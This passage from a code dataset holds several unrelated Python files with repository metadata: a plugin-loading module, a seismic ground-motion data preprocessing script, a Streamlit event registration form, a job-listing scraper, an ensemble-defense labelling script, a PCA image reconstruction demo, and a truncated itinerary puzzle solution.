It is\n # made available for 3.7 onwards (for now, at least).\n # Pip installs should have this module available, but other methods may not,\n # so be tolerant of it being missing.\n try:\n import importlib_metadata # pylint: disable=import-outside-toplevel\n except ImportError:\n self.__logger.warning(\n \"PythonPluginSystem: Can not load entry point plugins as the importlib_metadata \"\n \"package is unavailable.\"\n )\n return False\n\n self.__logger.debug(\n f\"PythonPluginSystem: Searching packages for '{entryPointName}' entry points.\"\n )\n\n for entryPoint in importlib_metadata.entry_points(group=entryPointName):\n self.__logger.debug(f\"PythonPluginSystem: Found entry point in {entryPoint.name}\")\n try:\n module = entryPoint.load()\n except Exception: # pylint: disable=broad-except\n self.__logger.error(\n f\"PythonPluginSystem: Caught exception loading {entryPoint.name}:\\n\"\n + traceback.format_exc()\n )\n continue\n\n if not hasattr(module, \"plugin\"):\n self.__logger.error(\n f\"PythonPluginSystem: No top-level 'plugin' variable {module.__file__}\"\n )\n continue\n\n self.register(module.plugin, module.__file__)\n\n return True\n\n def identifiers(self):\n \"\"\"\n Returns the identifiers known to the plugin system.\n\n If @ref scan has not been called, then this will be empty.\n\n @return `List[str]`\n \"\"\"\n return list(self.__map.keys())\n\n def plugin(self, identifier):\n \"\"\"\n Retrieves the plugin that provides the given identifier.\n\n @return @ref openassetio.pluginSystem.PythonPluginSystemPlugin\n \"PythonPluginSystemPlugin\"\n\n @exception errors.InputValidationException Raised if no plugin\n provides the specified identifier.\n \"\"\"\n\n if identifier not in self.__map:\n msg = \"PythonPluginSystem: No plug-in registered with the identifier '%s'\" % identifier\n raise InputValidationException(msg)\n\n return self.__map[identifier]\n\n def register(self, cls, path=\"\"):\n \"\"\"\n Allows manual registration of a PythonPluginSystemPlugin derived\n class.\n\n This can be used to register plugins using means other than\n the built-in file system scanning.\n\n @param cls @ref openassetio.pluginSystem.PythonPluginSystemPlugin\n \"PythonPluginSystemPlugin\"\n\n @param path `str` Some reference to where this plugin\n originated, used for debug messaging when duplicate\n registrations of the same identifier are encountered.\n \"\"\"\n identifier = cls.identifier()\n if identifier in self.__map:\n self.__logger.debug(\n f\"PythonPluginSystem: Skipping class '{cls}' defined in '{path}'. 
\"\n f\"Already registered by '{self.__paths[identifier]}'\"\n )\n return\n\n self.__logger.debug(f\"PythonPluginSystem: Registered plug-in '{cls}' from '{path}'\")\n\n self.__map[identifier] = cls\n self.__paths[identifier] = path\n\n def __load(self, path):\n \"\"\"\n Loads the specified python file and registers it's plugin.\n The file must expose a top-level 'plugin' variable.\n\n @param path `str` This can be either a single-file module,\n or the __init__.py at the root of a package.\n \"\"\"\n\n # Make a unique namespace to ensure the plugin identifier is\n # all that really matters\n moduleName = hashlib.md5(path.encode(\"utf-8\")).hexdigest()\n\n try:\n spec = importlib.util.spec_from_file_location(moduleName, path)\n if spec is None:\n raise RuntimeError(\"Unable to determine module spec\")\n\n module = importlib.util.module_from_spec(spec)\n\n # Without this, for package imports we get:\n # 'No module named ''\n sys.modules[spec.name] = module\n\n spec.loader.exec_module(module)\n\n except Exception: # pylint: disable=broad-except\n self.__logger.error(\n f\"PythonPluginSystem: Caught exception loading {path}:\\n\" + traceback.format_exc()\n )\n return\n\n if not hasattr(module, \"plugin\"):\n self.__logger.error(f\"PythonPluginSystem: No top-level 'plugin' variable {path}\")\n return\n\n # Store where this plugin was loaded from. Not entirely\n # accurate, but more useful for debugging than it not being\n # there.\n module.plugin.__file__ = path\n\n self.register(module.plugin, path)\n","repo_name":"OpenAssetIO/OpenAssetIO","sub_path":"src/openassetio-python/package/openassetio/pluginSystem/PythonPluginSystem.py","file_name":"PythonPluginSystem.py","file_ext":"py","file_size_in_byte":8581,"program_lang":"python","lang":"en","doc_type":"code","stars":239,"dataset":"github-code","pt":"18"} +{"seq_id":"1998581498","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 25 14:23:21 2020\n\n@author: aklimasewski\n\nread in NGA data and calculate 4 base gmpe average\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom base_gmpe import gmpe_avg\nimport sys\nimport os\nsys.path.append(os.path.abspath('/Users/aklimasewski/Documents/python_code_nonergodic'))\nfrom preprocessing import transform_dip\n\ndef saveNGAtargets(filename = '/Users/aklimasewski/Documents/data/Updated_NGA_West2_Flatfile_RotD50_d050_public_version.csv'):\n '''\n \n Parameters\n ----------\n filename: name of NGA file\n\n Returns\n saves filtered data in csv\n '''\n \n from base_gmpe import gmpe_avg\n \n # filename = '/Users/aklimasewski/Documents/data/Updated_NGA_West2_Flatfile_RotD50_d050_public_version.csv'\n dfnga = pd.read_csv(filename,index_col=0)\n \n periodnames = ['T10.000S','T7.500S','T5.000S','T4.000S','T3.000S','T2.000S','T1.000S','T0.200S','T0.500S','T0.100S']\n residtesttemp=dfnga.loc[:, periodnames]\n nga_GM=residtesttemp.values\n period=[10,7.5,5,4,3,2,1,0.5,0.2,0.1]\n \n Mwnga= dfnga[\"Earthquake Magnitude\"]\n vs30nga=np.array(dfnga[\"Vs30 (m/s) selected for analysis\"])\n latnga=dfnga[\"Station Latitude\"]\n longnga=dfnga[\"Station Longitude\"]\n hypolatnga=dfnga[\"Hypocenter Latitude (deg)\"]\n hypolonnga=dfnga[\"Hypocenter Longitude (deg)\"]\n hypodepthnga=dfnga[\"Hypocenter Depth (km)\"]\n rakenga=dfnga[\"Rake Angle (deg)\"]\n dipnga=dfnga[\"Dip (deg)\"]\n strikenga=dfnga[\"Strike (deg)\"]+180\n widthnga=dfnga[\"Fault Rupture Width (km)\"]\n \n rjbnga=dfnga[\"Joyner-Boore Dist. 
(km)\"]\n rxnga=dfnga[\"Rx\"]\n hypodisnga=dfnga[\"HypD (km)\"]\n distnga=dfnga[\"ClstD (km)\"]\n startdepthnga=dfnga[\"Depth to Top Of Fault Rupture Model\"]\n \n xinga = dfnga[\"X\"]\n \n # use avg CyberShake values\n z10nga=dfnga[\"Northern CA/Southern CA - S4 Z1 (m)\"]\n z25nga=dfnga[\"Northern CA/Southern CA - S4 Z2.5 (m)\"]\n \n dipnga,rxnga = transform_dip(np.array(dipnga),np.array(rxnga))\n \n ztest = np.column_stack([Mwnga,distnga,vs30nga,z10nga,z25nga,rakenga,dipnga,hypodepthnga, widthnga,\n rjbnga,rxnga,startdepthnga, xinga,latnga,longnga,hypolatnga,hypolonnga])\n \n # feature_names=np.asarray(['Mw','Rrup','Vs30', 'Z1.0', 'Z2.5', 'Rake','Dip','Hypo_depth', 'Width',\n # 'Rjb','Rx','Ztor','Xi','latnga','longnga','hypolatnga','hypolonnga',])\n feature_names=np.asarray(['Earthquake Magnitude','ClstD (km)','Vs30 (m/s) selected for analysis', 'Northern CA/Southern CA - S4 Z1 (m)', 'Northern CA/Southern CA - S4 Z2.5 (m)', 'Rake Angle (deg)','Dip (deg)','Hypocenter Depth (km)', 'Fault Rupture Width (km)','Joyner-Boore Dist. (km)','Rx','Depth to Top Of Fault Rupture Model','X','Station Latitude','Station Longitude','Hypocenter Latitude (deg)','Hypocenter Longitude (deg)',])\n \n lus1=dfnga[\"Lowest Usable Freq - H1 (Hz)\"]\n lus2=dfnga[\"Lowest Usable Freq - H2 (H2)\"]\n mm=np.max([lus1,lus2],axis=0)\n mmt=1./mm\n \n for j in range(nga_GM.shape[0]):\n indices = [i for i,v in enumerate(np.asarray(period) >= mmt[j]) if v]\n nonnan=np.zeros(nga_GM.shape[1])\n \n for k in range(nga_GM.shape[1]): \n nonnan[k]=np.count_nonzero(~np.isnan(nga_GM[:,k]))\n \n f1=plt.figure('Records at frequency2',figsize=(5,5))\n plt.semilogx(period,nonnan)\n plt.xlabel('Period (s)')\n plt.ylabel('Count')\n plt.title('Number of Accurate Records (PEER)')\n plt.grid()\n \n #'Mw','Rrup','Vs30', 'Z1.0' all greater than -200?\n for i in range(0,4+1):\n index=(ztest[:,i]>-200)\n ztest=ztest[index]\n print(ztest.shape)\n nga_GM=nga_GM[index]\n print(i,ztest.shape,i)\n \n #first SA values greater than 0\n index=(nga_GM[:,0]>0.0)\n ztest=ztest[index]\n nga_GM=nga_GM[index]\n print(ztest.shape,6)\n \n #second SA values greater than 0\n index=(nga_GM[:,1]>0.0)\n ztest=ztest[index]\n nga_GM=nga_GM[index]\n print(ztest.shape,7)\n \n #magnitude above 2.9\n index=(ztest[:,0]>2.9)\n ztest=ztest[index]\n nga_GM=nga_GM[index]\n print(ztest.shape,7)\n \n #distance max of 200km\n index=(ztest[:,1]<200)\n ztest=ztest[index]\n nga_GM=nga_GM[index]\n print(ztest.shape,7)\n \n #vs30 above 300\n index=(ztest[:,2]>300)# & (ztest[:,2]<710))\n ztest=ztest[index]\n nga_GM=nga_GM[index]\n print(ztest.shape,7)\n \n #z10max=900\n index=(ztest[:,3]<900)\n ztest=ztest[index]\n nga_GM=nga_GM[index]\n print(ztest.shape,7)\n \n #z25max=5350\n index=(ztest[:,4]<5350)\n ztest=ztest[index]\n nga_GM=nga_GM[index]\n print(ztest.shape,7)\n \n #rake angle above 5\n index=(ztest[:,5]>5)\n ztest=ztest[index]\n nga_GM=nga_GM[index]\n print(ztest.shape,13)\n \n #lat= 33.45402,35.21083\n index=((ztest[:,13]>= 33.45) & (ztest[:,13]<=35.21))\n ztest=ztest[index]\n nga_GM=nga_GM[index]\n print(ztest.shape,7)\n \n #lon= -120.8561, -116.4977\n index=((ztest[:,14]>= -120.8561) & (ztest[:,14]<= -116.4977))\n ztest=ztest[index]\n nga_GM=nga_GM[index]\n print(ztest.shape,7)\n \n for i in range(0,len(period)):\n index=(nga_GM[:,i]>-200)\n ztest=ztest[index]\n print(ztest.shape)\n nga_GM=nga_GM[index]\n print(i,ztest.shape,i)\n \n # in units of g\n nga_GM = np.log(9.81*nga_GM)#now in units of ln(m/s2)\n model_avg = gmpe_avg(ztest)\n NGA_targets = nga_GM - model_avg\n \n ztestdf = 
pd.DataFrame(data=ztest, columns=feature_names)\n GMdf = pd.DataFrame(data=nga_GM, columns=periodnames)\n ngatargetdf = pd.DataFrame(data=NGA_targets, columns=[(periodnames[i] + 'resid') for i in range(len(periodnames))])\n #save to df\n dfsave = pd.concat([ztestdf,GMdf,ngatargetdf],axis=1)\n dfsave.to_csv('/Users/aklimasewski/Documents/data/NGA_mag2_9.csv')\n\n#%%\n\ndef readindataNGA(filename,n=13):\n '''\n \n Parameters\n ----------\n filename: name of NGA file\n n: number of model parameters\n\n Returns\n nga_data1: numpy array of nga features\n nga_targets1: numpy array of nga targets\n feature_names: list of feature names\n '''\n \n import sys\n import os\n sys.path.append(os.path.abspath('/Users/aklimasewski/Documents/python_code_nonergodic'))\n from preprocessing import transform_dip\n import pandas as pd\n \n # name = '/Users/aklimasewski/Documents/data/Updated_NGA_West2_Flatfile_RotD50_d050_public_version.csv'\n dfnga = pd.read_csv(filename,index_col=0) \n\n # latmin=33,latmax=36.0,lonmin=-120.5,lonmax=-115.7\n # if region == True:\n # stlat = (dfnga[\"Station Latitude\"] >=33) & (dfnga[\"Station Latitude\"] <=36)\n # stlon = (dfnga[\"Station Longitude\"] >=-120.5) & (dfnga[\"Station Longitude\"] <=-115.7)\n # evlat = (dfnga[\"Hypocenter Latitude (deg)\"] >=33) & (dfnga[\"Hypocenter Latitude (deg)\"] <=36)\n # evlon = (dfnga[\"Hypocenter Longitude (deg)\"] >=-120.5) & (dfnga[\"Hypocenter Longitude (deg)\"] <=-115.7)\n # dfnga = dfnga[(stlat & stlon & evlat & evlon)] \n \n Mwnga= dfnga[\"Earthquake Magnitude\"]\n \n vs30nga=np.array(dfnga[\"Vs30 (m/s) selected for analysis\"])\n \n latnga=dfnga[\"Station Latitude\"]\n longnga=dfnga[\"Station Longitude\"]\n hypolatnga=dfnga[\"Hypocenter Latitude (deg)\"]\n hypolonnga=dfnga[\"Hypocenter Longitude (deg)\"]\n hypodepthnga=dfnga[\"Hypocenter Depth (km)\"]\n rakenga=dfnga[\"Rake Angle (deg)\"]\n dipnga=dfnga[\"Dip (deg)\"]\n # strikenga=dfnga[\"Strike (deg)\"]+180\n widthnga=dfnga[\"Fault Rupture Width (km)\"]\n \n #targets\n periodnames = ['T10.000Sresid','T7.500Sresid','T5.000Sresid','T4.000Sresid','T3.000Sresid','T2.000Sresid','T1.000Sresid','T0.200Sresid','T0.500Sresid','T0.100Sresid']\n residtesttemp=dfnga.loc[:, periodnames]\n nga_targets1=residtesttemp.values\n \n # lengthtrain=dfnga[\"Length\"]\n rjbnga=dfnga[\"Joyner-Boore Dist. 
(km)\"]\n rxnga=dfnga[\"Rx\"]\n # rytrain=dftrain[\"ry\"]\n # hypodisnga=dfnga[\"HypD (km)\"]\n distnga=dfnga[\"ClstD (km)\"]\n\n startdepthnga=dfnga[\"Depth to Top Of Fault Rupture Model\"]\n \n xinga = dfnga[\"X\"]\n \n # distnga = hypodisnga\n #use avg cyershake values\n z10nga=dfnga[\"Northern CA/Southern CA - S4 Z1 (m)\"]\n z25nga=dfnga[\"Northern CA/Southern CA - S4 Z2.5 (m)\"]\n \n dipnga,rxnga = transform_dip(np.array(dipnga),np.array(rxnga))\n \n \n if n ==12:\n nga_data1 = np.column_stack([Mwnga,distnga,vs30nga,z10nga,z25nga,rakenga,dipnga,hypodepthnga, widthnga,\n rjbnga,rxnga,startdepthnga])\n \n feature_names=np.asarray(['Mw','Rrup','Vs30', 'Z1.0', 'Z2.5', 'Rake','Dip','Hypo_depth', 'Width',\n 'Rjb','Rx','Ztor',])\n elif n==13:\n nga_data1 = np.column_stack([Mwnga,distnga,vs30nga,z10nga,z25nga,rakenga,dipnga,hypodepthnga, widthnga,\n rjbnga,rxnga,startdepthnga, xinga])\n \n feature_names=np.asarray(['Mw','Rrup','Vs30', 'Z1.0', 'Z2.5', 'Rake','Dip','Hypo_depth', 'Width',\n 'Rjb','Rx','Ztor','Xi',])\n \n #omit all records without targets\n # rows, cols = np.where(nga_targets1 == (-999.0))\n # rows = list(set(rows))\n # nga_targets1 = np.delete(nga_targets1,rows,axis=0)\n # nga_data1 = np.delete(nga_data1,rows,axis=0)\n \n #NGA targets\n \n return nga_data1, nga_targets1, feature_names\n\n\ndef add_locfeatNGA(filename, train_data1,feature_names):\n \n '''\n add station and hypocenter lat, lon\n \n Parameters\n ----------\n filename: name of NGA file\n n: number of model parameters\n\n Returns\n nga_data1: numpy array of nga features\n nga_targets1: numpy array of nga targets\n feature_names: list of feature names\n '''\n import numpy as np\n import pandas as pd\n\n dfnga = pd.read_csv(filename) \n \n latnga=dfnga[\"Station Latitude\"]\n longnga=dfnga[\"Station Longitude\"]\n hypolatnga=dfnga[\"Hypocenter Latitude (deg)\"]\n hypolonnga=dfnga[\"Hypocenter Longitude (deg)\"]\n\n train_data1_4 = np.column_stack([latnga, longnga, hypolatnga, hypolonnga])\n feature_names_4=np.asarray(['stlat', 'stlon', 'hypolat','hypolon'])\n \n train_data1 = np.concatenate([train_data1,train_data1_4], axis = 1)\n feature_names = np.concatenate([feature_names,feature_names_4], axis = 0)\n \n return train_data1, feature_names\n\n\ndef add_azNGA(filename, train_data1,feature_names):\n '''\n add forward aziumth as feature\n \n Parameters\n ----------\n filename: name of NGA file\n n: number of model parameters\n\n Returns\n nga_data1: numpy array of nga features\n nga_targets1: numpy array of nga targets\n feature_names: list of feature names\n '''\n #calculats forward azimuth between event and station and adds to training and testing data\n import pyproj\n import numpy as np\n \n geodesic = pyproj.Geod(ellps='WGS84')\n \n # filename = '/Users/aklimasewski/Documents/data/NGAWest2region.csv'\n # filename = '/Users/aklimasewski/Documents/data/NGAWest2region_clean.csv'\n \n dfnga = pd.read_csv(filename) \n \n latnga=dfnga[\"Station Latitude\"]\n longnga=dfnga[\"Station Longitude\"]\n hypolatnga=dfnga[\"Hypocenter Latitude (deg)\"]\n hypolonnga=dfnga[\"Hypocenter Longitude (deg)\"]\n\n train_data1_4 = np.column_stack([latnga, longnga, hypolatnga, hypolonnga])\n feature_names_4=np.asarray(['stlat', 'stlon', 'hypolat','hypolon'])\n \n #station lat lon and event lat lon\n az12,az21,distance = geodesic.inv(train_data1_4[:,3],train_data1_4[:,2],train_data1_4[:,1],train_data1_4[:,0])\n\n #add the path features\n train_data1 = np.concatenate([train_data1,az12.reshape(len(az12),1)], axis = 1)\n feature_names = 
np.concatenate([feature_names,np.asarray(['forward_az'])], axis = 0)\n \n return train_data1, feature_names\n\ndef add_midpointNGA(filename, train_data1, feature_names):\n '''\n add path midpoin lat, lon as feature\n \n Parameters\n ----------\n filename: name of NGA file\n n: number of model parameters\n\n Returns\n nga_data1: numpy array of nga features\n nga_targets1: numpy array of nga targets\n feature_names: list of feature names\n '''\n \n #calculated midpoint lat, lon between event and station and adds to training and testing data\n import numpy as np\n \n # filename = '/Users/aklimasewski/Documents/data/NGAWest2region.csv'\n # filename = '/Users/aklimasewski/Documents/data/NGAWest2region_clean.csv'\n \n dfnga = pd.read_csv(filename) \n \n latnga=dfnga[\"Station Latitude\"]\n longnga=dfnga[\"Station Longitude\"]\n hypolatnga=dfnga[\"Hypocenter Latitude (deg)\"]\n hypolonnga=dfnga[\"Hypocenter Longitude (deg)\"]\n\n train_data1_4 = np.column_stack([latnga, longnga, hypolatnga, hypolonnga])\n feature_names_4=np.asarray(['stlat', 'stlon', 'hypolat','hypolon'])\n \n #station lat lon and event lat lon\n midpoint = np.asarray([(train_data1_4[:,0]+train_data1_4[:,2])/2.,(train_data1_4[:,1]+train_data1_4[:,3])/2.]).T\n\n #add the path features\n train_data1 = np.concatenate([train_data1,midpoint], axis = 1)\n feature_names = np.concatenate([feature_names,np.asarray(['midpointlat','midpointlon'])], axis = 0)\n \n return train_data1, feature_names\n","repo_name":"aklimase/nonergodic_pathANN","sub_path":"readNGA.py","file_name":"readNGA.py","file_ext":"py","file_size_in_byte":13322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"5337791655","text":"import streamlit as st\r\nfrom PIL import Image\r\n\r\ndef registration_form():\r\n st.title(\"ANIRVEDA'S IPL Auction 2023\")\r\n st.write(\"💫 Greetings PDEU!! 💫\")\r\n st.write(\"Gear up for the most thrilling event of the academic calendar! 🎉\")\r\n st.write(\"The ✨ IPL auction ✨ is just a few days away, and it promises to be an unforgettable experience.\")\r\n st.write(\"This is your chance to step into the shoes of team owners and strategize like the pros🫱🏻‍🫲🏻\")\r\n st.write(\"Remember, it's not just about picking the best players; it's about managing your budget wisely and building a balanced squad. 💰🏏\")\r\n st.write(\"Will you go all-in for a star player or opt for emerging talent with potential? The choice is yours! 🌟🌟\")\r\n st.write(\"Assemble your team of cricket enthusiasts, polish your auctioneer skills, and prepare for a rollercoaster ride of bidding wars, unexpected twists, and strategic maneuvers. 
🔄✨💼\")\r\n st.write(\"For more details, join the WhatsApp group:\")\r\n st.write(\"https://chat.whatsapp.com/BCovv8RfVUBGs0PMHhfnzA\")\r\n st.write(\"\")\r\n st.write(\"\")\r\n st.write(\"Please fill in the following details to register:\")\r\n\r\n # Input fields\r\n name = st.text_input(\"Name:\", key=\"name\")\r\n roll_number = st.text_input(\"Roll Number:\", key=\"roll_number\")\r\n\r\n # Dropdown for Year of Study\r\n year_of_study_options = ['1st year', '2nd year', '3rd year', '4th year']\r\n year_of_study = st.selectbox(\"Year of Study:\", year_of_study_options, key=\"year_of_study\")\r\n\r\n # Dropdown for School\r\n school_options = ['SOT', 'SLS', 'SPT', 'SOET']\r\n school = st.selectbox(\"School:\", school_options, key=\"school\")\r\n\r\n \r\n\r\n st.header(\"Team Details\")\r\n team_name = st.text_input(\"Team Name:\", key=\"team_name\")\r\n\r\n st.header(\"Player Details\")\r\n\r\n # Player 1 (Team Leader)\r\n st.subheader(\"Player 1 (Team Leader)\")\r\n player1_name = st.text_input(\"Name:\", key=\"player1_name\")\r\n player1_roll_number = st.text_input(\"Roll Number:\", key=\"player1_roll_number\")\r\n player1_contact = st.text_input(\"Contact Number (WhatsApp):\", key=\"player1_contact\")\r\n player1_email = st.text_input(\"Email:\", key=\"player1_email\")\r\n\r\n # Player 2\r\n st.subheader(\"Player 2\")\r\n player2_name = st.text_input(\"Name:\", key=\"player2_name\")\r\n player2_roll_number = st.text_input(\"Roll Number:\", key=\"player2_roll_number\")\r\n player2_contact = st.text_input(\"Contact Number (WhatsApp):\", key=\"player2_contact\")\r\n player2_email = st.text_input(\"Email:\", key=\"player2_email\")\r\n\r\n # Player 3\r\n st.subheader(\"Player 3\")\r\n player3_name = st.text_input(\"Name:\", key=\"player3_name\")\r\n player3_roll_number = st.text_input(\"Roll Number:\", key=\"player3_roll_number\")\r\n player3_contact = st.text_input(\"Contact Number (WhatsApp):\", key=\"player3_contact\")\r\n player3_email = st.text_input(\"Email:\", key=\"player3_email\")\r\n\r\n # Player 4\r\n st.subheader(\"Player 4\")\r\n player4_name = st.text_input(\"Name:\", key=\"player4_name\")\r\n player4_roll_number = st.text_input(\"Roll Number:\", key=\"player4_roll_number\")\r\n player4_contact = st.text_input(\"Contact Number (WhatsApp):\", key=\"player4_contact\")\r\n player4_email = st.text_input(\"Email:\", key=\"player4_email\")\r\n\r\n \r\n # Registration Fees\r\n st.header(\"Registration Fees\")\r\n st.write(\"If you have mode of payment as online pay using the following qr code or via the upi id: ritikaadhiya21@oksbi\")\r\n st.write(\"If you have mode of payment as cash, please contact the following numbers: \")\r\n st.write(\"Rajat Agrawal: 9664981455\")\r\n st.write(\"Sumer Pandey: 9979878903\")\r\n st.write(\"Registration Fees: RS50 per team\")\r\n registration_fees = 50\r\n st.write(f\"Total Registration Fees: {registration_fees}\")\r\n\r\n # Payment Instructions Image\r\n payment_instructions_image = Image.open(\"payment.jpg\")\r\n st.image(payment_instructions_image, caption=\"Payment Instructions:\", use_column_width=True)\r\n\r\n # Screenshot Upload\r\n st.write(\"Please upload a screenshot as proof of payment:\")\r\n screenshot = st.file_uploader(\"Upload Screenshot (JPG or PNG)\", type=[\"jpg\", \"png\"], key=\"screenshot\", accept_multiple_files=False)\r\n\r\n # Queries\r\n queries = st.text_area(\"Do you have any queries or special requests? 
(Optional):\", key=\"queries\")\r\n\r\n # Submit button\r\n if st.button(\"Submit\"):\r\n try:\r\n # Validate required fields\r\n if not all([\r\n name, roll_number, year_of_study, school, team_name,\r\n player1_name, player1_roll_number, player1_contact, player1_email\r\n ]):\r\n st.error(\"Please fill in all the required fields.\")\r\n elif not screenshot:\r\n st.error(\"Please upload a screenshot as proof of payment.\")\r\n else:\r\n # Save the screenshot as proof\r\n screenshot.save(\"payment_proof.png\")\r\n\r\n st.success(\"Registration Successful!\")\r\n # You can add code to submit the registration details and the payment proof to a database or another service here.\r\n\r\n except Exception as e:\r\n st.error(\"An error occurred during registration. Please try again later.\")\r\n st.error(str(e))\r\n\r\nif __name__ == \"__main__\":\r\n registration_form()\r\n","repo_name":"RajatAgrawal117/AV_IPL_Form","sub_path":"IPLForm.py","file_name":"IPLForm.py","file_ext":"py","file_size_in_byte":5322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70553229801","text":"import requests\nimport os\nfrom bs4 import BeautifulSoup\n\nurl = \"https://www.jobindex.dk/jobsoegning?q=Python\"\npage = requests.get(url)\n\nsoup = BeautifulSoup(page.content, \"html.parser\")\n\nresults = soup.find(id=\"result_list_box\")\n\njob_elements = results.find_all(\"div\", class_=\"PaidJob-inner\")\n\nfor job_element in job_elements:\n title_elemet = job_element.find(\"b\")\n print(title_elemet.text.strip())\n\n# Link: https://realpython.com/beautiful-soup-web-scraper-python/\n\n\n\n\n#class = PaidJob-inner\n#","repo_name":"ChristinaBartholomaeussen/pythonSessions","sub_path":"Session5_UtilitiesAndModules/Ex5_BuildAWebScraperWithPython/webscraper.py","file_name":"webscraper.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36281695381","text":"import os\nimport sys\nimport time\n\nimport numpy as np\n\nfrom utils.config import *\nfrom utils.util import *\n\ndef usage():\n print(\"=======================================================================================\")\n print(\"python inputImagesFP modelsDir experimentRootDir datasetName numOfClasses\")\n print(\"=======================================================================================\")\n\nif len(sys.argv) != 6:\n usage()\n exit(1)\n\n\ninputImagesFP = sys.argv[1]\nmodelsDir = sys.argv[2]\nexperimentRootDir = sys.argv[3]\ndatasetName = sys.argv[4]\nnumOfClasses = int(sys.argv[5])\n\nDATA.set_current_dataset_name(datasetName)\n\n# Basic parameters for k-fold experiment setup\narchitecture = MODEL.ARCHITECTURE\nAETypes = ATTACK.get_AETypes()\nnumOfAETypes = len(AETypes)\n\ntargetModelName = \"clean\"\ntransformConfig = TRANSFORMATION()\ntransformationList = transformConfig.supported_types() \ntransformationList = transformationList[1:] # exclude the 'clean' transformation - no transformation\n\n\n# Load models and create models to output logits\nmodelFilenamePrefix = datasetName+\"-\"+architecture\nmodels, logitsModels = loadModels(modelsDir, modelFilenamePrefix, transformationList)\n\n\n# Prediction\ninputSamples = np.load(inputImagesFP)\nnumOfSamples = inputSamples.shape[0]\nnumOfTrans = len(transformationList)\npredShape = (numOfTrans, numOfSamples, numOfClasses)\npredProb = np.zeros(predShape)\npredLogits = np.zeros(predShape)\n\nfor modelID in range(numOfTrans):\n transformType = 
transformationList[modelID]\n print(\"\\t\\t\\t [{}] prediction on {} model\".format(modelID, transformType))\n # Transformation cost\n tranSamples = transform_images(inputSamples, transformType)\n\n # model prediction cost - using probability-based defense\n predProb[modelID, :, :], _ = prediction(\n tranSamples,\n models[modelID])\n # model prediction cost - using logits-based defense\n predLogits[modelID, :, :], _ = prediction(\n tranSamples,\n logitsModels[modelID])\n\n\npredProbLC = np.zeros((predProb.shape[0], predProb.shape[1], 2))\npredProbLC[:, :, 0] = np.argmax(predProb, axis=2)\npredProbLC[:, :, 1] = np.max(predProb, axis=2)\n\ntrainModelDir = os.path.join(experimentRootDir, \"train_models\")\nnewLabelsDir = os.path.join(experimentRootDir, \"newLabels\")\ncreateDirSafely(newLabelsDir)\nnumOfDefenses = numOfCVDefenses+2*numOfWCDefenses\n# Test each ensemble model trained by each type of AEs\nfor AETypeIdx in range(numOfAETypes):\n AEType = AETypes[AETypeIdx]\n curTrainModelDir = os.path.join(trainModelDir, AEType)\n curNewLabelsDir = os.path.join(newLabelsDir, AEType)\n createDirSafely(curNewLabelsDir)\n\n print(\"Collecting new labels from the ensemble models built upon \"+AEType)\n\n # accuracy of clustering-and-voting based defenses\n for defenseIdx in range(numOfCVDefenses):\n defenseName = cvDefenseNames[defenseIdx] \n newLabelsFilename = defenseName+\"_newLabels.npy\"\n clusters = loadCAVModel(os.path.join(curTrainModelDir, defenseName+\".txt\"))\n\n # getting new labels\n votedResults, _ = votingAsDefense(\n predProbLC,\n clusters,\n vsac=cvDefenseNames[defenseIdx],\n measureTC=False)\n newLabels = votedResults[:, 0]\n np.save(os.path.join(curNewLabelsDir, newLabelsFilename), newLabels)\n\n\n # accuracy of weighted-confidence based defenses\n for defenseIdx in range(numOfWCDefenses):\n defenseName = wcDefenseNames[defenseIdx]\n for plIdx in range(2):\n wcMatFilename = defenseName+\"_EM.npy\"\n mIDsFilename = defenseName+\"_modelIDs.npy\"\n newLabelsFilename = defenseName+\"_newLabels.npy\"\n pred = predProb\n if plIdx == 1: # predict logit instead of probability\n wcMatFilename = \"LG_\" + wcMatFilename\n mIDsFilename = \"LG_\" + mIDsFilename\n newLabelsFilename = \"LG_\" + newLabelsFilename\n pred = predLogits\n\n wcMat = np.load(os.path.join(curTrainModelDir, wcMatFilename))\n # ID of transform models: starts from 0.\n mIDs = np.load(os.path.join(curTrainModelDir, mIDsFilename))\n \n curPred = pred[mIDs] \n\n # getting new labels\n predLabels, _ = wcdefenses(\n curPred, wcMat, defenseName, measureTC=False)\n\n newLabels = predLabels\n np.save(os.path.join(curNewLabelsDir, newLabelsFilename), newLabels)\n\n","repo_name":"nybupt/athena","sub_path":"src/data/generate_data_from_ensemble_models.py","file_name":"generate_data_from_ensemble_models.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71131054759","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.decomposition import PCA\nimport random 
\n\nwith open('t10k-labels-idx1-ubyte','rb') as lbpath:\n labels = np.frombuffer(lbpath.read(), dtype=np.uint8,\n offset=8)\n \nwith open('t10k-images-idx3-ubyte','rb') as imgpath:\n images = np.frombuffer(imgpath.read(), dtype=np.uint8,\n offset=16).reshape(len(labels), 784)\n\ncolors = ['b','g','r','c','m','y','k','tab:gray','lime','orange']\n\n\npcs = PCA(n_components=185).fit(images)\n\nprint(f'number of principal components={185}', 'explained variance 
ratio=',np.sum(pcs.explained_variance_ratio_))\n\nt_images = pcs.transform(images)\nre_images = pcs.inverse_transform(t_images)\n\nfig, axs = plt.subplots(3, 2)\nfig.tight_layout()\nfor i in range(3):\n x = random.randint(0,10000)\n axs[i,0].imshow(images[x,:].reshape(28,28),cmap='gray')\n axs[i,0].set_title('Original',size=10)\n axs[i,1].imshow(re_images[x,:].reshape(28,28),cmap='gray')\n axs[i,1].set_title('Reconstructed',size=10)\nplt.show()\n","repo_name":"fardinayar/SPR","sub_path":"HW4/7/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"20107034736","text":"# using a stack\n# tried BFS at first, but with BFS, when the starting point is the same there can be multiple destinations,\n# which makes the exception handling hard..\n# most solutions use dfs or a stack..\n\ndef solution(tickets):\n answer = []\n # sort in reverse order to use a stack (problem condition: alphabetical order)\n tickets.sort(reverse=True)\n route = 